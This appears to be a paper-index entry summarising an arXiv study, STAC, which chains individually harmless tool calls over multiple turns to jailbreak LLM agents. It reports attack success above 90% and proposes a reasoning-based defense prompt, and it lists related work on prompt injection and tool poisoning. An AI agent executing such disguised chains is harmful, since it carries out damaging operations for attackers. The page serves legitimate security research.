attack 2025

STAC: When Innocent Tools Form Dangerous Chains to Jailbreak LLM Agents

Jing-Jing Li ^1,2, Jianfeng He ¹, Chao Shang ¹, Devang Kulshreshtha ¹, Xun Xian ¹, Yi Zhang ¹, Hang Su ¹, Sandesh Swamy ¹, Yanjun Qi ¹

¹ AWS AI Labs

² UC Berkeley

4 citations · 47 references · arXiv

Published on arXiv

2509.25624

Insecure Plugin Design

OWASP LLM Top 10 — LLM07

Prompt Injection

OWASP LLM Top 10 — LLM01

Key Finding

STAC achieves attack success rates exceeding 90% on GPT-4.1 and other state-of-the-art LLM agents, while existing prompt-based defenses provide limited protection and the proposed reasoning-driven defense cuts ASR by up to 28.8%.

STAC (Sequential Tool Attack Chaining)

Novel technique introduced

As LLMs advance into autonomous agents with tool-use capabilities, they introduce security challenges that extend beyond traditional content-based LLM safety concerns. This paper introduces Sequential Tool Attack Chaining (STAC), a novel multi-turn attack framework that exploits agent tool use. STAC chains together tool calls that each appear harmless in isolation but, when combined, collectively enable harmful operations that only become apparent at the final execution step. We apply our framework to automatically generate and systematically evaluate 483 STAC cases, featuring 1,352 sets of user-agent-environment interactions and spanning diverse domains, tasks, agent types, and 10 failure modes. Our evaluations show that state-of-the-art LLM agents, including GPT-4.1, are highly vulnerable to STAC, with attack success rates (ASR) exceeding 90% in most cases. The core design of STAC's automated framework is a closed-loop pipeline that synthesizes executable multi-step tool chains, validates them through in-environment execution, and reverse-engineers stealthy multi-turn prompts that reliably induce agents to execute the verified malicious sequence. We further perform defense analysis against STAC and find that existing prompt-based defenses provide limited protection. To address this gap, we propose a new reasoning-driven defense prompt that achieves far stronger protection, cutting ASR by up to 28.8%. These results highlight a crucial gap: defending tool-enabled agents requires reasoning over entire action sequences and their cumulative effects, rather than evaluating isolated prompts or responses.

Key Contributions

Introduces STAC (Sequential Tool Attack Chaining), a multi-turn attack framework that chains individually harmless tool calls to achieve harmful goals only detectable at the final execution step.
Constructs and evaluates 483 STAC cases spanning 10 failure modes and diverse agent types, finding >90% ASR on state-of-the-art agents including GPT-4.1.
Proposes a reasoning-driven defense prompt that reasons over cumulative action sequences rather than isolated prompts, reducing ASR by up to 28.8%.

🛡️ Threat Analysis

Details

Domains

nlp

Model Types

llm

Threat Tags

black_boxinference_timetargeted

Datasets

STAC benchmark (483 cases, 1352 user-agent-environment interactions, custom)

Applications

llm agentstool-enabled autonomous agentsfile management agents

Read PDF arXiv DOI Code

STAC: When Innocent Tools Form Dangerous Chains to Jailbreak LLM Agents

Key Contributions

🛡️ Threat Analysis

Details

Similar Papers

AdapTools: Adaptive Tool-based Indirect Prompt Injection Attacks on Agentic LLMs

Invisible Threats from Model Context Protocol: Generating Stealthy Injection Payload via Tree-based Adaptive Search

Automatic Red Teaming LLM-based Agents with Model Context Protocol Tools

MCP-ITP: An Automated Framework for Implicit Tool Poisoning in MCP

Jailbreaking Large Language Models through Iterative Tool-Disguised Attacks via Reinforcement Learning

QueryIPI: Query-agnostic Indirect Prompt Injection on Coding Agents

SkillJect: Automating Stealthy Skill-Based Prompt Injection for Coding Agents with Trace-Driven Closed-Loop Refinement

Cuckoo Attack: Stealthy and Persistent Attacks Against AI-IDE